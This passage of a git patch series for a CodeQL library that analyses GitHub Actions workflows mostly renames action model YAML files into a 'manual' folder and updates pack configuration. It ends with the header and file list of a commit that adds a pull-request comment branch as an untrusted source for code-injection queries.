b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml similarity index 100% rename from ql/lib/ext/csexton_release-asset-action.model.yml rename to ql/lib/ext/manual/csexton_release-asset-action.model.yml diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml similarity index 100% rename from ql/lib/ext/cycjimmy_semantic-release-action.model.yml rename to ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml similarity index 100% rename from ql/lib/ext/cypress-io_github-action.model.yml rename to ql/lib/ext/manual/cypress-io_github-action.model.yml diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml similarity index 100% rename from ql/lib/ext/dailydotdev_action-devcard.model.yml rename to ql/lib/ext/manual/dailydotdev_action-devcard.model.yml diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml similarity index 100% rename from ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml rename to ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml similarity index 100% rename from ql/lib/ext/daspn_private-actions-checkout.model.yml rename to ql/lib/ext/manual/daspn_private-actions-checkout.model.yml diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-ansible-playbook.model.yml rename to ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-download-artifact.model.yml rename to ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml similarity index 100% rename from ql/lib/ext/delaguardo_setup-clojure.model.yml rename to ql/lib/ext/manual/delaguardo_setup-clojure.model.yml diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml similarity index 100% rename from ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml rename to ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml similarity index 100% rename from ql/lib/ext/docker-practice_actions-setup-docker.model.yml rename to ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/docker_build-push-action.model.yml rename to ql/lib/ext/manual/docker_build-push-action.model.yml diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml similarity index 100% rename from ql/lib/ext/endbug_latest-tag.model.yml rename to ql/lib/ext/manual/endbug_latest-tag.model.yml diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml similarity index 100% rename from ql/lib/ext/expo_expo-github-action.model.yml rename to ql/lib/ext/manual/expo_expo-github-action.model.yml diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml similarity index 100% rename from ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml rename to ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert_replace-string-action.model.yml rename to ql/lib/ext/manual/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml similarity index 100% rename from ql/lib/ext/franzdiebold_github-env-vars-action.model.yml rename to ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml similarity index 100% rename from ql/lib/ext/gabrielbb_xvfb-action.model.yml rename to ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-builder.model.yml rename to ql/lib/ext/manual/game-ci_unity-builder.model.yml diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-test-runner.model.yml rename to ql/lib/ext/manual/game-ci_unity-test-runner.model.yml diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml similarity index 100% rename from ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml rename to ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/getsentry_action-release.model.yml rename to ql/lib/ext/manual/getsentry_action-release.model.yml diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/github_codeql-action.model.yml rename to ql/lib/ext/manual/github_codeql-action.model.yml diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml similarity index 100% rename from ql/lib/ext/go-semantic-release_action.model.yml rename to ql/lib/ext/manual/go-semantic-release_action.model.yml diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml similarity index 100% rename from ql/lib/ext/golangci_golangci-lint-action.model.yml rename to ql/lib/ext/manual/golangci_golangci-lint-action.model.yml diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml similarity index 100% rename from ql/lib/ext/gonuit_heroku-docker-deploy.model.yml rename to ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml similarity index 100% rename from ql/lib/ext/goreleaser_goreleaser-action.model.yml rename to ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml similarity index 100% rename from ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml rename to ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml similarity index 100% rename from ql/lib/ext/gradle_gradle-build-action.model.yml rename to ql/lib/ext/manual/gradle_gradle-build-action.model.yml diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml similarity index 100% rename from ql/lib/ext/haya14busa_action-cond.model.yml rename to ql/lib/ext/manual/haya14busa_action-cond.model.yml diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml similarity index 100% rename from ql/lib/ext/hexlet_project-action.model.yml rename to ql/lib/ext/manual/hexlet_project-action.model.yml diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml similarity index 100% rename from ql/lib/ext/ilammy_msvc-dev-cmd.model.yml rename to ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml similarity index 100% rename from ql/lib/ext/ilammy_setup-nasm.model.yml rename to ql/lib/ext/manual/ilammy_setup-nasm.model.yml diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml similarity index 100% rename from ql/lib/ext/imjohnbo_issue-bot.model.yml rename to ql/lib/ext/manual/imjohnbo_issue-bot.model.yml diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-cml.model.yml rename to ql/lib/ext/manual/iterative_setup-cml.model.yml diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-dvc.model.yml rename to ql/lib/ext/manual/iterative_setup-dvc.model.yml diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml similarity index 100% rename from ql/lib/ext/jamesives_github-pages-deploy-action.model.yml rename to ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.model.yml rename to ql/lib/ext/manual/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml similarity index 100% rename from ql/lib/ext/johnnymorganz_stylua-action.model.yml rename to ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml similarity index 100% rename from ql/lib/ext/jsdaniell_create-json.model.yml rename to ql/lib/ext/manual/jsdaniell_create-json.model.yml diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml similarity index 100% rename from ql/lib/ext/jurplel_install-qt-action.model.yml rename to ql/lib/ext/manual/jurplel_install-qt-action.model.yml diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml similarity index 100% rename from ql/lib/ext/jwalton_gh-ecr-push.model.yml rename to ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml similarity index 100% rename from ql/lib/ext/khan_pull-request-comment-trigger.model.yml rename to ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml similarity index 100% rename from ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml rename to ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-lua.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-lua.model.yml diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-luarocks.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml similarity index 100% rename from ql/lib/ext/lucasbento_auto-close-issues.model.yml rename to ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml similarity index 100% rename from ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml rename to ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml similarity index 100% rename from ql/lib/ext/magefile_mage-action.model.yml rename to ql/lib/ext/manual/magefile_mage-action.model.yml diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml similarity index 100% rename from ql/lib/ext/maierj_fastlane-action.model.yml rename to ql/lib/ext/manual/maierj_fastlane-action.model.yml diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml similarity index 100% rename from ql/lib/ext/manusa_actions-setup-minikube.model.yml rename to ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml similarity index 100% rename from ql/lib/ext/marocchino_on_artifact.model.yml rename to ql/lib/ext/manual/marocchino_on_artifact.model.yml diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml similarity index 100% rename from ql/lib/ext/mattdavis0351_actions.model.yml rename to ql/lib/ext/manual/mattdavis0351_actions.model.yml diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml similarity index 100% rename from ql/lib/ext/meteorengineer_setup-meteor.model.yml rename to ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml similarity index 100% rename from ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml rename to ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml similarity index 100% rename from ql/lib/ext/microsoft_setup-msbuild.model.yml rename to ql/lib/ext/manual/microsoft_setup-msbuild.model.yml diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml similarity index 100% rename from ql/lib/ext/mishakav_pytest-coverage-comment.model.yml rename to ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml similarity index 100% rename from ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml rename to ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/msys2_setup-msys2.model.yml rename to ql/lib/ext/manual/msys2_setup-msys2.model.yml diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml similarity index 100% rename from ql/lib/ext/mxschmitt_action-tmate.model.yml rename to ql/lib/ext/manual/mxschmitt_action-tmate.model.yml diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml similarity index 100% rename from ql/lib/ext/mymindstorm_setup-emsdk.model.yml rename to ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-chromedriver.model.yml rename to ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-php.model.yml rename to ql/lib/ext/manual/nanasess_setup-php.model.yml diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml similarity index 100% rename from ql/lib/ext/nick-fields_retry.model.yml rename to ql/lib/ext/manual/nick-fields_retry.model.yml diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_graphql-action.model.yml rename to ql/lib/ext/manual/octokit_graphql-action.model.yml diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_request-action.model.yml rename to ql/lib/ext/manual/octokit_request-action.model.yml diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml similarity index 100% rename from ql/lib/ext/olafurpg_setup-scala.model.yml rename to ql/lib/ext/manual/olafurpg_setup-scala.model.yml diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml similarity index 100% rename from ql/lib/ext/paambaati_codeclimate-action.model.yml rename to ql/lib/ext/manual/paambaati_codeclimate-action.model.yml diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml similarity index 100% rename from ql/lib/ext/peter-evans_create-pull-request.model.yml rename to ql/lib/ext/manual/peter-evans_create-pull-request.model.yml diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml similarity index 100% rename from ql/lib/ext/peter-murray_issue-body-parser-action.model.yml rename to ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml similarity index 100% rename from ql/lib/ext/plasmicapp_plasmic-action.model.yml rename to ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml similarity index 100% rename from ql/lib/ext/preactjs_compressed-size-action.model.yml rename to ql/lib/ext/manual/preactjs_compressed-size-action.model.yml diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml similarity index 100% rename from ql/lib/ext/py-actions_flake8.model.yml rename to ql/lib/ext/manual/py-actions_flake8.model.yml diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml similarity index 100% rename from ql/lib/ext/py-actions_py-dependency-install.model.yml rename to ql/lib/ext/manual/py-actions_py-dependency-install.model.yml diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml similarity index 100% rename from ql/lib/ext/pyo3_maturin-action.model.yml rename to ql/lib/ext/manual/pyo3_maturin-action.model.yml diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml similarity index 100% rename from ql/lib/ext/reactivecircus_android-emulator-runner.model.yml rename to ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml similarity index 100% rename from ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml rename to ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml similarity index 100% rename from ql/lib/ext/reggionick_s3-deploy.model.yml rename to ql/lib/ext/manual/reggionick_s3-deploy.model.yml diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml similarity index 100% rename from ql/lib/ext/renovatebot_github-action.model.yml rename to ql/lib/ext/manual/renovatebot_github-action.model.yml diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml similarity index 100% rename from ql/lib/ext/roots_issue-closer-action.model.yml rename to ql/lib/ext/manual/roots_issue-closer-action.model.yml diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml similarity index 100% rename from ql/lib/ext/ros-tooling_setup-ros.model.yml rename to ql/lib/ext/manual/ros-tooling_setup-ros.model.yml diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml similarity index 100% rename from ql/lib/ext/ruby_setup-ruby.model.yml rename to ql/lib/ext/manual/ruby_setup-ruby.model.yml diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml similarity index 100% rename from ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml rename to ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml similarity index 100% rename from ql/lib/ext/sergeysova_jq-action.model.yml rename to ql/lib/ext/manual/sergeysova_jq-action.model.yml diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml similarity index 100% rename from ql/lib/ext/shallwefootball_upload-s3-action.model.yml rename to ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml similarity index 100% rename from ql/lib/ext/shogo82148_actions-setup-perl.model.yml rename to ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml similarity index 100% rename from ql/lib/ext/skitionek_notify-microsoft-teams.model.yml rename to ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml similarity index 100% rename from ql/lib/ext/snow-actions_eclint.model.yml rename to ql/lib/ext/manual/snow-actions_eclint.model.yml diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml similarity index 100% rename from ql/lib/ext/stackhawk_hawkscan-action.model.yml rename to ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml similarity index 100% rename from ql/lib/ext/step-security_harden-runner.model.yml rename to ql/lib/ext/manual/step-security_harden-runner.model.yml diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml similarity index 100% rename from ql/lib/ext/suisei-cn_actions-download-file.model.yml rename to ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml similarity index 100% rename from ql/lib/ext/tibdex_backport.model.yml rename to ql/lib/ext/manual/tibdex_backport.model.yml diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml similarity index 100% rename from ql/lib/ext/timheuer_base64-to-file.model.yml rename to ql/lib/ext/manual/timheuer_base64-to-file.model.yml diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_branch-names.model.yml rename to ql/lib/ext/manual/tj-actions_branch-names.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml similarity index 100% rename from ql/lib/ext/trilom_file-changes-action.model.yml rename to ql/lib/ext/manual/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml similarity index 100% rename from ql/lib/ext/tripss_conventional-changelog-action.model.yml rename to ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml similarity index 100% rename from ql/lib/ext/tryghost_action-deploy-theme.model.yml rename to ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml similarity index 100% rename from ql/lib/ext/tzkhan_pr-update-action.model.yml rename to ql/lib/ext/manual/tzkhan_pr-update-action.model.yml diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml similarity index 100% rename from ql/lib/ext/veracode_veracode-sca.model.yml rename to ql/lib/ext/manual/veracode_veracode-sca.model.yml diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml similarity index 100% rename from ql/lib/ext/wearerequired_lint-action.model.yml rename to ql/lib/ext/manual/wearerequired_lint-action.model.yml diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml similarity index 100% rename from ql/lib/ext/webfactory_ssh-agent.model.yml rename to ql/lib/ext/manual/webfactory_ssh-agent.model.yml diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml similarity index 100% rename from ql/lib/ext/xt0rted_slash-command-action.model.yml rename to ql/lib/ext/manual/xt0rted_slash-command-action.model.yml diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-baseline.model.yml rename to ql/lib/ext/manual/zaproxy_action-baseline.model.yml diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-full-scan.model.yml rename to ql/lib/ext/manual/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index abc56e6a0900..aece8aacc5f5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -11,6 +11,6 @@ dependencies: extractor: javascript groups: javascript dataExtensions: - - ext/*.model.yml - - ext/**/*.model.yml - - ext/workflow-models/workflow-models.yml + - ext/manual/*.model.yml + - ext/generated/**/*.model.yml + - ext/config/*.yml diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index b3dc9185ec4c..a4d4eb43bb21 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions +import codeql.actions.config.ConfigExtensions as Extensions from string path, string trigger, string job, string secrets_source, string permissions, From 61797e91807695bff916e24cfd078e1bb5a4c848 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:27:08 +0200 Subject: [PATCH 347/707] Add pull_request-comment-branch head_ref as a source --- .../security/UntrustedCheckoutQuery.qll | 6 +++++- ...bell_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/eficode_resolve-pr-refs.model.yml | 8 ++++++++ ...tson_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/tj-actions_branch-names.model.yml | 2 -- ...rted_pull-request-comment-branch.model.yml | 7 +++++++ ql/test/library-tests/test.expected | 5 ++++- .../CWE-094/.github/workflows/test7.yml | 20 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++++++ .../CWE-094/CodeInjectionMedium.expected | 6 ++++++ 10 files changed, 72 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml create mode 100644 ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 